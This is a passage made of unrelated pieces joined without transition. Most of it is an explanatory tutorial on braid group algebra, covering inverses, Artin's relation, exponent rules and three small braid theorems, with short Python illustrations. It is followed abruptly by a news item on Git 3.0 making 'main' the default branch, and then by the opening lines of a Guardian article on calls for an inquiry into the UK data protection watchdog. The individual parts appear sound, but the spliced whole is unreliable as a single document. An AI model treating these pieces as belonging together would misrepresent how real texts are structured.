That is to say, for any three braids $B_1$, $B_2$, and $B_3$, are $(B_1 * B_2) * B_3$ and $B_1 * (B_2 * B_3)$ always the same braid?

Absolutely! This is an immediate result of how concatenation works. We don't even need to consider any specific braids to see this. Just let the yellow, pink, and green rectangles below represent arbitrary braids $B_1$, $B_2$, and $B_3$, respectively.
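
Under the same assumed word encoding sketched earlier, a tiny Python check illustrates the point (it is an illustration, not a proof): however we group the concatenations, the resulting word of crossings is the same.

    # Sketch: grouping does not matter when concatenating braid words.

    B1, B2, B3 = "ae", "ch", "edh"    # three arbitrary (hypothetical) braid words

    left_grouping = (B1 + B2) + B3    # (B1 * B2) * B3
    right_grouping = B1 + (B2 + B3)   # B1 * (B2 * B3)

    assert left_grouping == right_grouping == "aechedh"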


Q: Is there an identity braid?

Again, recall the multiplicative identity for real numbers is the value $1$ as we can multiply any real value by $1$ (or vice-versa) and leave it unchanged. Notice this works in both directions -- that is to say, for any real value $x$, it is true that $x \cdot 1 = 1 \cdot x = x$.

Similarly, the additive identity for real numbers is the value $0$ as we can add $0$ to any real value $x$ and leave it unchanged. (Again, reversing the order from $x+0$ to $0+x$ has no impact -- both result in $x$.)

If we seek an identity braid with respect to concatenation, then we seek a braid that could be concatenated to any other braid (on either side) and leave its sequence of crossings unchanged.

Consider that unique braid on some number of strands, $I$, that has no crossings at all!

As the below clearly suggests, concatenating such a braid $I$ to any other braid $B$ (with the same number of strands, of course) leaves $B$ essentially unchanged (i.e., the strands might be a tad longer, but the crossings are all still intact, and that's what's important).

The reverse is easily shown to hold as well (i.e., $I * B = B$ for any braid $B$).

As such, the braid $I$ on $n$ strands with no crossings serves as an identity for the concatenation of braids on $n$ strands.
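
In the word encoding sketched earlier, the identity braid is simply the empty word, which makes its behavior under concatenation especially easy to see (again, just a sketch under that assumed encoding):

    # Sketch: the identity braid I, having no crossings, is the empty word.

    I = ""                # the braid with no crossings
    B = "aeahchchedh"     # any braid word

    assert B + I == B     # B * I = B
    assert I + B == B     # I * B = B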


Q: Do braids have inverses?

Here again, let us restrict our attention to "braids on $n$ strands" for a particular $n$.

Following the pattern of multiplicative inverses discussed earlier, we then seek for any such braid $B$ an inverse $B^{-1}$ where $B * B^{-1} = I$ and $B^{-1} * B = I$     (assuming $I$ denotes the braid identity)

Remember the simple braids that we previously used to identify a braid of $5$ strands with a sequence of letters? Here's a similar set of braids for braids of $4$ strands:

Regardless of the number of strands involved, notice that these always occur in pairs where the same two strands cross -- one where the first of the two strands passes over the second, and one where it passes under. Indeed, each of these pairs is an inverse pair, as suggested by the names given to the six simple braids immediately above. After concatenating each such pair, only a couple of tugs on the strands are needed to simplify the result to the identity braid $I$ (on $n$ strands), as the below demonstrates for one such pair:

Just to be explicit about the naming convention adopted above, note that for any $i = 1,2,3,\ldots$, we let $x_i$ denote the braid where strands at positions $i$ and $i+1$ cross, with the strand at position $i$ going "over" the strand at position $i+1$. We denote the inverse of $x_i$ by $x_i^{-1}$, where the strand at position $i$ goes "under" the strand at position $i+1$. As a matter of verbiage, we call the set of all such $x_i$ and their inverses the elementary braids on $n$ strands.

Armed now with these inverse pairs of elementary braids, we can build inverses for more complicated braids.

We can think of the individual crossings as actions taken on the strands that change their state, much like the individual actions of putting on one's socks, shoes, and rain boots (which go over one's shoes) each change the state of your feet. The inverse action to some combination of these can be found by "undoing" each individual action, but in reverse.

Suppose one puts on one's socks, and then shoes, and then rain boots, in that order. We could consider other orders, but are likely to over-stretch our socks in doing so. 😆 To undo this combination of three individual actions (returning one's feet to their bare state), one removes the rain boots, then one's shoes, then one's socks. (Note the reverse order!)

Likewise, if we apply elementary braids $x_1$, $x_3^{-1}$, and $x_2$ in that order, we can undo them by applying their inverses $x_2^{-1}$, $x_3$, and then $x_1^{-1}$, in this reversed order.
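
If one wanted to compute such inverses mechanically, a small Python sketch follows. The encoding (writing $x_i$ as $+i$ and $x_i^{-1}$ as $-i$, so a braid word becomes a list of nonzero integers) is an assumption made purely for illustration, and the helper name is hypothetical.

    # Sketch: undo each crossing, in reverse order (the socks/shoes/boots rule).

    def inverse(word: list[int]) -> list[int]:
        """Return the inverse braid word: reverse the word and flip each crossing."""
        return [-crossing for crossing in reversed(word)]

    word = [1, -3, 2]         # x_1, then x_3^{-1}, then x_2
    print(inverse(word))      # -> [-2, 3, -1], i.e. x_2^{-1}, then x_3, then x_1^{-1}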

Below are the braid diagrams for concatenation and simplification of the example just described. Note that, given how far this similarity between braid concatenation and real number multiplication seems to be going, we'll go ahead and adopt some additional notational conventions often used for products.

Specifically -- just as we often abbreviate $a \cdot b$ with $ab$ when dealing with products of real numbers $a$ and $b$ -- we'll often omit the "$*$" operator between variables representing braids (elementary or otherwise), leaving their concatenation assumed by their adjacency. We may also now start referring to such concatenations as "braid products", or simply "products" when the context is clear.

As you consider the braid product being simplified below, note how we take advantage of the associativity of braid concatenation to evaluate the product of the center-most two elementary braids at each step -- which, being an inverse pair, results in the identity braid $I$ which can then be removed as it has no effect (except the last $I$, of course).

Of course, we could imagine untangling the initial concatenation by visualizing tugging some of the strands up or down at key moments to reduce the number of crossings, too. However, the advantage of using the properties of inverses and identities to get from one step to the next is that we no longer really need the pictures (which were cumbersome to draw in the first place) -- we can proceed to simplify things in a completely algebraic way, as shown next.

As you consider the concatenation of braids $x_1 x_3^{-1} x_2$ and $x_2^{-1} x_3 x_1^{-1}$ below and its (algebraic) simplification, notice that we have initially added parentheses around each, so that we can more easily see what is being concatenated at the moment. Of course, using parentheses in this way again mirrors yet another familiar way we often write products of real numbers. For example, $6 = (2)(3)$. $$\begin{array}{rcl} (x_1 x_3^{-1} x_2)(x_2^{-1} x_3 x_1^{-1}) & = & x_1 x_3^{-1} x_2 x_2^{-1} x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} (x_2 x_2^{-1}) x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} I x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} (I x_3) x_1^{-1}\\ & = & x_1 x_3^{-1} x_3 x_1^{-1}\\ & = & x_1 (x_3^{-1} x_3) x_1^{-1}\\ & = & x_1 I x_1^{-1}\\ & = & x_1 (I x_1^{-1})\\ & = & x_1 x_1^{-1}\\ & = & I \end{array}$$

In truth, the above is a bit verbose -- showing all the intermediate steps each time an inverse pair produces an identity braid $I$, which then combines with whatever comes next to leave only whatever comes next.

In practice, this combination of steps is so common we often omit this level of detail when writing the steps taken to simplify a braid -- writing only something similar to the below (which one will notice mirrors the "braid words" given with the pictures above):

$$\begin{array}{rcl} (x_1 x_3^{-1} x_2)(x_2^{-1} x_3 x_1^{-1}) & = & x_1 x_3^{-1} x_2 x_2^{-1} x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} x_3 x_1^{-1}\\ & = & x_1 x_1^{-1}\\ & = & I \end{array}$$
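
This "cancel an adjacent inverse pair, then drop the resulting $I$" bookkeeping is easy to automate. Below is a small Python sketch using the same assumed $+i$/$-i$ encoding as before (helper name hypothetical); it reproduces the simplification just shown.

    # Sketch: repeatedly cancel adjacent inverse pairs (an x_i next to an x_i^{-1}).

    def cancel_inverse_pairs(word: list[int]) -> list[int]:
        """Remove adjacent inverse pairs until none remain."""
        reduced: list[int] = []
        for crossing in word:
            if reduced and reduced[-1] == -crossing:
                reduced.pop()      # the pair collapses to I, which then drops out
            else:
                reduced.append(crossing)
        return reduced

    # (x_1 x_3^{-1} x_2)(x_2^{-1} x_3 x_1^{-1}) simplifies to the identity braid:
    product = [1, -3, 2] + [-2, 3, -1]
    print(cancel_inverse_pairs(product))    # -> [], i.e. the identity braid I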

There is precedent for this. Consider the steps taken as one simplifies the fraction $\frac{ab}{b}$ (where $b \neq 0$), which are shown below. (Remember that $\frac{b}{b}$ equals the value $1$, the multiplicative "identity"): $$\frac{ab}{b} = a \cdot \frac{b}{b} = a \cdot 1 = a$$ Something like this happens every time one cancels a common factor in the numerator and denominator of a fraction -- but we often skip all that detail, writing only $$\frac{ab}{b} = a$$


Braid Multiplication and Commutativity

The above clearly establishes there is some sort of "multiplicative arithmetic" we can apply to braids, but we must be careful to not let our analogy go too far. One significant difference between braid multiplication and the multiplication of numerical values with which we are well familiar is that braid multiplication is not generally commutative.

That is to say, we don't always have $B_1 B_2 = B_2 B_1$ for any braids $B_1$ and $B_2$.

As a simple example of this, consider the following two braids. Notice the first "product" on the right can't be simplified to the second. For example, the strand initially at position $1$ ends up in position $4$ in the first product, but not in the second.

The lack of general commutativity for braid products certainly decreases the ease with which we may manipulate braids, but as Alexander Graham Bell once said: "When one door closes, another opens."

Special pairs of braids do actually enjoy commutativity. One can easily see that the identity braid $I$ commutes with any other braid. The same can be said of inverse pairs. Interestingly, "distant" elementary braids also commute. That is to say, elementary braids $x_i$ and $x_j$ appearing next to one another in a product will commute whenever they are far enough apart that they don't involve a common strand position. Noting that this only happens when $i$ and $j$ are at least two apart, we can equivalently say: $$x_i x_j = x_j x_i \textrm{ when } |i-j| \ge 2$$

This is perhaps easier to understand with an example. Note in the diagram below, we can change the order of the pink elementary braids without effectively changing the overall braid. However, if we change the order of the yellow elementary braids, the overall braid is a different braid.
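
As a quick computational aside (using the assumed $+i$/$-i$ encoding from earlier), deciding whether two crossings sitting next to one another in a word may be swapped comes down to comparing their indices.

    # Sketch: neighboring crossings commute when they share no strand position.

    def may_swap(a: int, b: int) -> bool:
        """True when the two crossings involve no common strand position."""
        return abs(abs(a) - abs(b)) >= 2

    print(may_swap(1, 3))    # True: x_1 and x_3 commute
    print(may_swap(2, 3))    # False: x_2 and x_3 both involve strand position 3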


Artin's Relation

Emil Artin

Named after Emil Artin, one of the leading mathematicians of the twentieth century and the developer of the theory of braids as a branch of an area of mathematics known as algebraic topology, Artin's relation provides the last piece of the puzzle when establishing the strange arithmetic of braids.

With a little mental "tugging" on the strands below, one should easily be able to convince oneself that this relation holds for elementary braids $x_i$ and $x_{i+1}$ multiplied (i.e., concatenated) in the given way.

What is important, however, is that this special braid relation will allow us to manipulate braids now in a completely algebraic way -- never having to draw pictures like those above, if desired.

$\displaystyle{{\large \textrm{Artin's Relation}: x_i \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}}}$

Putting It All Together

We have seen that braids on $n$ strands can be represented by algebraic expressions/words consisting of concatenations of elementary braids $x_1,x_2,x_3,\ldots,x_{n-1}$ and/or their inverses $x_1^{-1},x_2^{-1},x_3^{-1},\ldots,x_{n-1}^{-1}$.

These braid expressions are not unique to a given braid, however. We can certainly show two braid words represent the same braid by drawing pictures of each and "tugging" the strands this way and that until these pictures are identical. However, the equality of two braid words can also be shown by applying algebraic manipulations to one to produce the other, in accordance with the following rules:

(Assume $i$ and $j$ are taken from $1,2,\ldots,n-1$ as appropriate, that each $B_i$ represents an arbitrary braid word, and that $I$ represents the identity braid with no crossings.)

  • Braid Associativity: $(B_1 B_2) B_3 = B_1 (B_2 B_3)$
  • Multiplication by the Identity: $I \, B_i = B_i \, I = B_i$
  • Inverse Relations: $x_i \, x_i^{-1} = I = x_i^{-1} \, x_i$
  • Commutativity of Distant Braids: $x_i \, x_j = x_j \, x_i$ when $|i-j| \ge 2$
  • Artin's Relation: $x_i \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}$

Now let's put these to use! Consider the following way to simplify a braid $B$ on $4$ strands where $$B = x_3^{-1} \, x_2 \, x_3 \, x_2 \, x_3^{-1}$$ Note that since only $x_2$ and $x_3$ appear here (and $|2-3| = 1$), we won't be able to take advantage of the commutativity of distant braids. Further, we have no inverse pairs adjacent to one another, so we can't use any inverse relations yet.

However, there is an opportunity to apply Artin's relation. Notice, once we take advantage of this, we see two inverse pairs that can then be eliminated -- greatly simplifying the resulting expression!

$$\begin{array}{rcl} B & = & x_3^{-1} \, x_2 \, \, x_3 \, x_2 \, x_3^{-1}\\ & = & x_3^{-1} \, (x_2 \, \, x_3 \, x_2) \, x_3^{-1}\\ & = & x_3^{-1} \, (x_3 \, x_2 \, x_3) \, x_3^{-1}\\ & = & (x_3^{-1} \, x_3) \, x_2 \, (x_3 \, x_3^{-1})\\ & = & I \, x_2 \, I\\ & = & (I \, x_2) \, I\\ & = & x_2 \, I\\ & = & x_2 \end{array}$$
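
For those following along in code, the same simplification can be reproduced mechanically. The Python sketch below (same assumed $+i$/$-i$ encoding; helper names hypothetical) applies Artin's relation at the indicated spot and then cancels the inverse pairs that appear.

    # Sketch: rewrite x_i x_{i+1} x_i -> x_{i+1} x_i x_{i+1} at a chosen position,
    # then cancel adjacent inverse pairs.

    def apply_artin(word: list[int], position: int) -> list[int]:
        i, j, k = word[position:position + 3]
        assert i == k > 0 and j == i + 1, "Artin's relation does not apply here"
        return word[:position] + [j, i, j] + word[position + 3:]

    def cancel_inverse_pairs(word: list[int]) -> list[int]:
        reduced: list[int] = []
        for crossing in word:
            if reduced and reduced[-1] == -crossing:
                reduced.pop()
            else:
                reduced.append(crossing)
        return reduced

    B = [-3, 2, 3, 2, -3]                        # x_3^{-1} x_2 x_3 x_2 x_3^{-1}
    B_after_artin = apply_artin(B, 1)            # -> [-3, 3, 2, 3, -3]
    print(cancel_inverse_pairs(B_after_artin))   # -> [2], i.e. B simplifies to x_2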

Expanding Braid Notation

Knowing that intermixed copies of a braid $b$ and its inverse $b^{-1}$ can result in cancellations leaving a product/concatenation of $b$ with itself some number of times (as demonstrated in the example below), we might find it useful and more compact to abbreviate a braid $b$ (elementary or otherwise) multiplied/concatenated by itself $p$ times by $b^p$. $$\begin{array}{rcl} b \, b \, b \, b^{-1} \, b \, b^{-1} \, b \, b & = & b \, b \, (b \, b^{-1}) \, (b \, b^{-1}) \, b \, b\\ & = & b \, b \, I \, I \, b \, b\\ & = & b \, b \, b \, b\\ & = & b^4 \end{array}$$

However, if the number of factors of the form $b^{-1}$ exceeds the number of factors of the form $b$, such products will simplify to a concatenation of $b^{-1}$ with itself some number of times (see example below). In these cases, abbreviating $(b^{-1})^p$ with $b^{-p}$ also seems natural and more compact.

$$\begin{array}{rcl} b \, b^{-1} \, b^{-1} \, b^{-1} \, b \, b^{-1} \, b \, b^{-1} & = & (b \, b^{-1}) \, b^{-1} \, (b^{-1} \, b) \, (b^{-1} \, b) \, b^{-1}\\ & = & I \, b^{-1} \, I \, I \, b^{-1}\\ & = & b^{-1} \, b^{-1}\\ & = & b^{-2} \end{array}$$

Of course, there is a third possibility. It could be that pairing off the $b$ and $b^{-1}$ elementary braids and eliminating them leaves nothing but $I$ in the end, as the following suggests: $$\begin{array}{rcl} b \, b^{-1} \, b^{-1} \, b^{-1} \, b \, b \, b^{-1} \, b & = & (b \, b^{-1}) \, b^{-1} \, (b^{-1} \, b) \, (b \, b^{-1}) \, b\\ & = & I \, b^{-1} \, I \, I \, b\\ & = & b^{-1} \, b\\ & = & I \end{array}$$
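
In code, this bookkeeping for powers of a single braid $b$ reduces to counting. Writing $+1$ for each $b$ and $-1$ for each $b^{-1}$ (an encoding assumed purely for illustration), the net exponent is just the sum, and the three cases above fall out directly.

    # Sketch: the net exponent of a word written only in b and b^{-1}.

    def net_power(word: list[int]) -> int:
        """Return p such that the word simplifies to b^p (p = 0 means I)."""
        return sum(word)

    print(net_power([1, 1, 1, -1, 1, -1, 1, 1]))     # ->  4   (the b^4 example)
    print(net_power([1, -1, -1, -1, 1, -1, 1, -1]))  # -> -2   (the b^{-2} example)
    print(net_power([1, -1, -1, -1, 1, 1, -1, 1]))   # ->  0   (the I example)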

Given the above, let us now make the following two additional definitions:

  • $b^0 = I$
  • $b^1 = b$

The reason for making the last two definitions above stems from the following observation: With these two definitions, we can safely say that the following simplification rules will now always hold, regardless of what integers $p$ and $q$ are involved! (Note that without these definitions, products like $x_i^3 x_i^{-3}$ or $x_i^3 x_i^{-2}$ can't be simplified with these rules.)

  • $b^p \, b^q = b^{p+q}$ (add exponents when multiplying powers)

  • $(b^p)^q = b^{pq}$ (multiply exponents when finding a power of a power)

Just for clarity, please know that the above examples and rules hold for any braid $b$, including elementary braids of the form $b = x_i$ or $b = x_i^{-1}$. As examples, it must be the case by the last two rules that $x_4^3 x_4^5 = x_4^8$ and $(x_2^7)^3 = x_2^{21}$.

Note that the first rule (the one about adding exponents) forces $b^p \, b^{-q} = b^{p-q}$ to also be true for any integers $p$ and $q$.

Taking things one step further, recall that the division of one real number by another is equivalent to multiplying the first by the reciprocal (i.e., the multiplicative inverse) of the second. In a parallel way, we can define and denote the "division of one braid by another" (and the equivalent "fraction of braids") in the following way: $$b_1 \div b_2 = \frac{b_1}{b_2} = b_1 b_2^{-1}$$
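
A short Python sketch of this definition, reusing the reverse-and-flip idea for inverses from earlier (same assumed $+i$/$-i$ encoding; helper names hypothetical):

    # Sketch: "dividing" by a braid means concatenating with its inverse.

    def inverse(word: list[int]) -> list[int]:
        return [-crossing for crossing in reversed(word)]

    def divide(b1: list[int], b2: list[int]) -> list[int]:
        """b1 / b2 = b1 * b2^{-1}."""
        return b1 + inverse(b2)

    print(divide([1, 2], [3, 1]))   # x_1 x_2 divided by x_3 x_1 -> [1, 2, -1, -3]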

Doing this leads to even more results for general braids which mirror the standard exponent rules with which the reader might already be familiar.

  • $\displaystyle{\frac{b^p}{b^q} = b^{p-q}}$ (subtract exponents when dividing powers)

  • $\displaystyle{b^{-p} = \frac{I}{b^p}}$ (negative exponents produce reciprocals of powers) To see why, consider replacing $I$ with $b^0$.

  • $\displaystyle{\frac{I}{b_i b_j} = b_j^{-1} b_i^{-1}}$ (to invert a product, invert each factor and combine in reverse order) To see why, consider $b_i \, b_j \, b_j^{-1} \, b_i^{-1}$.

We'll have more to say about the aforementioned standard exponent rules soon -- and why there is such a strong parallel between these and the rules we are developing for braids (and other things we will learn about shortly). For now however, let us push things even farther...

Note that we can say even more for commutative braids $b_i$ and $b_j$ or their inverses (e.g., "distant" elementary braids $x_i$ and $x_j$, where $|i-j| \ge 2$ or inverse pairs). In particular, for all integers $p$ the following simplification rules also must apply:

  • $(b_i b_j)^p = b_i^p b_j^p$ (exponents distribute over products of commutative elementary braids)

  • $\displaystyle{\left( \frac{b_i}{b_j} \right)^p = \frac{b_i^p}{b_j^p}}$ (exponents distribute over quotients of commutative elementary braids)

  • If $b_1$, $b_2$, $b_3$, and $b_4$ are all pairwise commutative, then

    $\displaystyle{\frac{b_1 b_2}{b_3 b_4} = \frac{b_1}{b_3} \cdot \frac{b_2}{b_4}}$ (quotients of products can be expressed as products of quotients)

To see how commutativity plays a role in the first two rules, note that to establish the first (i.e., exponents distribute over products) we can use commutativity to get all the $b_i$ factors together so they can be consolidated into a single power, as shown in the following example (look carefully between the 3rd and 4th expressions): $$(b_i b_j)^2 = (b_i b_j)(b_i b_j) = b_i b_j b_i b_j = b_i b_i b_j b_j = b_i^2 b_j^2$$ Then, we can use the first rule to prove the second (i.e., where exponents are seen to distribute over quotients): $$\left(\frac{b_i}{b_j}\right)^2 = (b_i b_j^{-1})^2 = b_i^2 b_j^{-2} = \frac{b_i^2}{b_j^2}$$

As for the last rule, note how commutativity allows us to get from the third expression below to the fourth: $$\frac{b_1 b_2}{b_3 b_4} = b_1 b_2 (b_3 b_4)^{-1} = b_1 b_2 b_4^{-1} b_3^{-1} = b_1 b_3^{-1} b_2 b_4^{-1} = \frac{b_1}{b_3} \cdot \frac{b_2}{b_4}$$

Just be careful -- don't use any of these or other rules that rely on commutativity holding when it fails to hold!


Braid Theorems

While the results and definitions in the last section will let us prove certain pairs of braid expressions describe the same braid, sometimes doing so by direct application of these results and definitions can be quite long and tedious -- especially when we find ourselves applying the same sequence of manipulations over and over again. This of course is one reason why we prove theorems in mathematics -- to let us jump over all that repetition and make a useful (read that as "usable in many different contexts") conclusion from some given knowledge. We only need to prove the theorem in question holds.

As an example, for any given positive integer $i$, note how we can justify the following sequence of manipulations with what we know already: $$\begin{array}{rcll} x_i \, x_{i+1} \, x_i^{-1} & = & I \, x_i \, x_{i+1} \, x_i^{-1} & \scriptsize{\textrm{a property of the identity braid}}\\ & = & (x_{i+1}^{-1} \, x_{i+1}) \, x_i \, x_{i+1} \, x_i^{-1} & \scriptsize{\textrm{using inverse braids to form a "well-chosen value of "} I}\\ & = & x_{i+1}^{-1} \, (x_{i+1} \, x_i \, x_{i+1}) \, x_i^{-1} & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_{i+1}^{-1} \, (x_i \, x_{i+1} \, x_i) \, x_i^{-1} & \scriptsize{\textrm{Artin's Relation}}\\ & = & x_{i+1}^{-1} \, x_i \, x_{i+1} \, (x_i \, x_i^{-1}) & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_{i+1}^{-1} \, x_i \, x_{i+1} \, I & \scriptsize{\textrm{cancellation of inverse braids}}\\ & = & x_{i+1}^{-1} \, x_i \, x_{i+1} & \scriptsize{\textrm{a property of the identity braid}}\\ \end{array}$$

For lack of a better name, let us call this "Braid Theorem 1". That is to say,

Braid Theorem 1

For any positive integer $i$, the following will always be equivalent:     $x_i \, x_{i+1} \, x_i^{-1} = x_{i+1}^{-1} \, x_i \, x_{i+1}$

Having now proven this theorem, we can employ it in future manipulations. For example, suppose we were trying to decide if the following two braid words represent the same braid: $$x_2 \, x_3^{-1} \, x_2 \, x_2 \, x_3 \, x_2^{-1} \quad \stackrel{\text{?}}{=} \quad x_2 \, x_3^{-1} \, (x_3^{-1} \, x_3) \, x_2 \, x_3^{-1} \, x_2 \, x_3$$

With the theorem we just proved, we can prove they are equivalent in just 4 steps instead of the 10 steps it would require without it! $$\begin{array}{rcll} x_2 \, x_3^{-1} \, x_2 \, x_2 \, x_3 \, x_2^{-1} & = & x_2 \, x_3^{-1} \, x_2 \, (x_2 \, x_3 \, x_2^{-1}) & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_2 \, x_3^{-1} \, x_2 \, (x_3^{-1} \, x_2 \, x_3) & \scriptsize{\textrm{braid theorem 1}}\\ & = & x_2 \, x_3^{-1} \, I \, x_2 \, x_3^{-1} \, x_2 \, x_3 & \scriptsize{\textrm{a property of the identity braid}}\\ & = & x_2 \, x_3^{-1} \, (x_3^{-1} \, x_3) \, x_2 \, x_3^{-1} \, x_2 \, x_3 & \scriptsize{\textrm{using inverse braids to form a "well-chosen value of "} I}\\ \end{array}$$
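
As a sanity check, the Python sketch below replays this four-step argument with the assumed $+i$/$-i$ encoding (helper names hypothetical): applying Braid Theorem 1 to the subword $x_2 \, x_3 \, x_2^{-1}$ on the left and cancelling the inserted inverse pair on the right lands both sides on the very same word.

    # Sketch: Braid Theorem 1 rewrites x_i x_{i+1} x_i^{-1} into x_{i+1}^{-1} x_i x_{i+1}.

    def apply_theorem_1(word: list[int], position: int) -> list[int]:
        i, j, k = word[position:position + 3]
        assert i > 0 and j == i + 1 and k == -i, "Theorem 1 does not apply here"
        return word[:position] + [-j, i, j] + word[position + 3:]

    def cancel_inverse_pairs(word: list[int]) -> list[int]:
        reduced: list[int] = []
        for crossing in word:
            if reduced and reduced[-1] == -crossing:
                reduced.pop()
            else:
                reduced.append(crossing)
        return reduced

    left = [2, -3, 2, 2, 3, -2]          # x_2 x_3^{-1} x_2 x_2 x_3 x_2^{-1}
    right = [2, -3, -3, 3, 2, -3, 2, 3]  # x_2 x_3^{-1} (x_3^{-1} x_3) x_2 x_3^{-1} x_2 x_3

    # Both reduce to x_2 x_3^{-1} x_2 x_3^{-1} x_2 x_3:
    assert apply_theorem_1(left, 3) == cancel_inverse_pairs(right) == [2, -3, 2, -3, 2, 3]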

Of course, proving some theorems can lead to wondering about others. For example, the expressions involved in the statement of Braid Theorem 1 are reminiscent of those in Artin's Relation -- except for the presence of an inverse elementary braid. What happens if the inverse elementary braid is in a different location -- say, on the first $x_i$ instead of the second? Because it would be "pretty" (due to the inherent symmetry involved), we might even hope that the following turns out to be true -- that for every positive integer $i$, we have $x_i^{-1} \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}^{-1}$.

If this were true, we could remember both results as essentially an "Artin-like manipulation with a move of the inverse from one side to the other".

Of course, we don't know if this result holds yet -- we are only hopeful. We must prove it works for any positive integer $i$ before we can use it.

Let's try to argue similarly to how the last one was argued: $$\begin{array}{rcll} x_i^{-1} \, x_{i+1} \, x_i & = & x_i^{-1} \, x_{i+1} \, x_i \, I & \scriptsize{\textrm{a property of the identity braid}}\\ & = & x_i^{-1} \, x_{i+1} \, x_i \, (x_{i+1} \, x_{i+1}^{-1}) & \scriptsize{\textrm{using inverse braids to form a "well-chosen value of "} I}\\ & = & x_i^{-1} \, (x_{i+1} \, x_i \, x_{i+1}) \, x_{i+1}^{-1} & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & x_i^{-1} \, (x_i \, x_{i+1} \, x_i) \, x_{i+1}^{-1} & \scriptsize{\textrm{Artin's Relation}}\\ & = & (x_i^{-1} \, x_i) \, x_{i+1} \, x_i \, x_{i+1}^{-1} & \scriptsize{\textrm{associativity of braid concatenation}}\\ & = & I \, x_{i+1} \, x_i \, x_{i+1}^{-1} & \scriptsize{\textrm{cancellation of inverse braids}}\\ & = & x_{i+1} \, x_i \, x_{i+1}^{-1} & \scriptsize{\textrm{a property of the identity braid}}\\ \end{array}$$ Voila! We have shown that which we hoped to demonstrate -- we have proven our result!

By the way, in math textbooks one often sees the letters "QED." written at the end of a proof. This is merely an acronym for the Latin phrase "quod erat demonstrandum" which means "which was to be demonstrated".

Let us refer to this new theorem with an equally imaginative name -- say, "Braid Theorem 2":

Braid Theorem 2

For any positive integer $i$, the following will always be equivalent:     $x_i^{-1} \, x_{i+1} \, x_i = x_{i+1} \, x_i \, x_{i+1}^{-1}$

This is essentially how theorems in mathematics (involving braids or otherwise) get developed. First, somebody makes a good guess as to what they think should hold. Sometimes, this stems from some desire for the world to be "pretty" or symmetric. Other times, one makes some conjecture based on patterns they see hold in specific examples. Then, they try to form an argument that connects what they know to what they hope to show -- one that can be justified at every step and turn by things already accepted as true (e.g., definitions, postulates, other previously-proven theorems, etc).

One often tries to base these arguments on tricks or techniques that have worked in the past, much as we used the proof of Braid Theorem 1 as a guide to proving Braid Theorem 2. In this sense, mathematicians can build both on their own experience and on that of others. Interestingly however, the real fun for mathematicians begins when things they or others have used in the past fail to work! Working hard to find a new "wrinkle" on an old technique or creating a brand new way to argue something altogether -- that's where things get exciting!

Sadly, textbook presentations of theorems and their proofs often leave out any discussion of the "blood, sweat, and tears" that went into a proof's initial construction. If you are lucky, they might briefly discuss the inspiration for the creative argument, but almost never explicitly address the author's excitement upon discovering that their novel approach bore fruit. Instead, the proof is often simply written as efficiently as possible -- often even omitting things deemed "easy enough" for the reader to fill in.

Part of this is to draw the reader's attention to the interesting (perhaps novel?) steps.


Sgt. Joe Friday
Another part of this is to not bias the reader to a particular line of conjecture and discovery, providing instead -- as a certain famed sergeant from the 1950's television show Dragnet would often say when questioning women as part of his police investigation:
" Just the facts, ma'am. " -- Sgt. Joe Friday

Perhaps the greatest motivation for this habit, however, lies in the very thing that drove us to develop braid words and the above algebra they afford in the first place. In this, and in many, many more examples in the future, we will see that mathematicians seem to work very hard in everything they do to save themselves effort in the future. This includes being as brief and efficient as possible with anything they write.

As an example of this less verbose way of introducing a theorem and its proof, consider the following:

Braid Theorem 3

For any positive integer $i$, the following will always be equivalent:     $x_i x_{i+1}^{-1} x_i^{-1} = x_{i+1}^{-1} \, x_i^{-1} \, x_{i+1}$

Proof: $$\begin{array}{rcll} x_i \, x_{i+1}^{-1} \, x_i^{-1} & = & (x_{i+1}^{-1} \, x_{i+1}) \, x_i \, x_{i+1}^{-1} \, x_i^{-1} & \\ & = & x_{i+1}^{-1} \, (x_{i+1} \, x_i \, x_{i+1}^{-1}) \, x_i^{-1} & \\ & = & x_{i+1}^{-1} \, (x_i^{-1} \, x_{i+1} \, x_i) \, x_i^{-1} & \scriptsize{\textrm{ by braid theorem 2}}\\ & = & x_{i+1}^{-1} \, x_i^{-1} \, x_{i+1} \, (x_i \, x_i^{-1}) \\ & = & x_{i+1}^{-1} \, x_i^{-1} \, x_{i+1}\\ \end{array}$$

Notice in the above how the steps involving concatenation with $I$ were left out, much like one rarely writes a "multiplication by 1". Also, the more common applications of associativity or properties of inverses were left implicit, while the use of braid theorem 2 (i.e., the interesting step) was highlighted.

Just remember, when reading proofs presented in a "just the facts" style like the one above, it is your job as the reader to make sure you can justify each new step from the previous ones. To help you do this, you should always keep a pencil nearby when reading a math book!


Before continuing, you might try to conjecture and then prove results similar to braid theorems 1-3 that involve the following braids: $x_i^{-1} \, x_{i+1}^{-1} \, x_i$ and $x_i^{-1} \, x_{i+1}^{-1} \, x_i^{-1}$.

Git 3.0 will use main as the default branch

Hacker News
thoughtbot.com
2025-11-24 06:37:20
Comments...
Original Article

Starting with Git 3.0, developers will no longer have to configure the default branch for new repositories.

Git 2.52, released this week, includes this small but meaningful line in the patch notes :

Declare that “git init” that is not otherwise configured uses ‘main’ as the initial branch, not ‘master’, starting Git 3.0.

This change has been a long time coming. The Software Freedom Conservancy—the nonprofit home of the Git project—said on June 23, 2020 that Git would eventually update its default branch name. GitHub followed soon after, changing its default branch for new repositories to main on October 1, 2020.

Git 3.0 has no planned release date as of now, but current estimates put it near the end of 2026.

Other notable changes planned for 3.0 include:

  • Changing the default hash function from SHA-1 to SHA-256, improving security.
  • Changing the default storage format to better support macOS and Windows, and to improve performance.
  • More formally integrating Rust into Git’s own build process.


Civil liberties groups call for inquiry into UK data protection watchdog

Guardian
www.theguardian.com
2025-11-24 06:00:30
Campaigners including Good Law Project describe ICO ‘collapse in enforcement activity’ after Afghan data breach Dozens of civil liberties campaigners and legal professionals are calling for an inquiry into the UK’s data protection watchdog, after what they describe as “a collapse in enforcement act...
Original Article

Dozens of civil liberties campaigners and legal professionals are calling for an inquiry into the UK’s data protection watchdog, after what they describe as “a collapse in enforcement activity” after the scandal of the Afghan data breach .

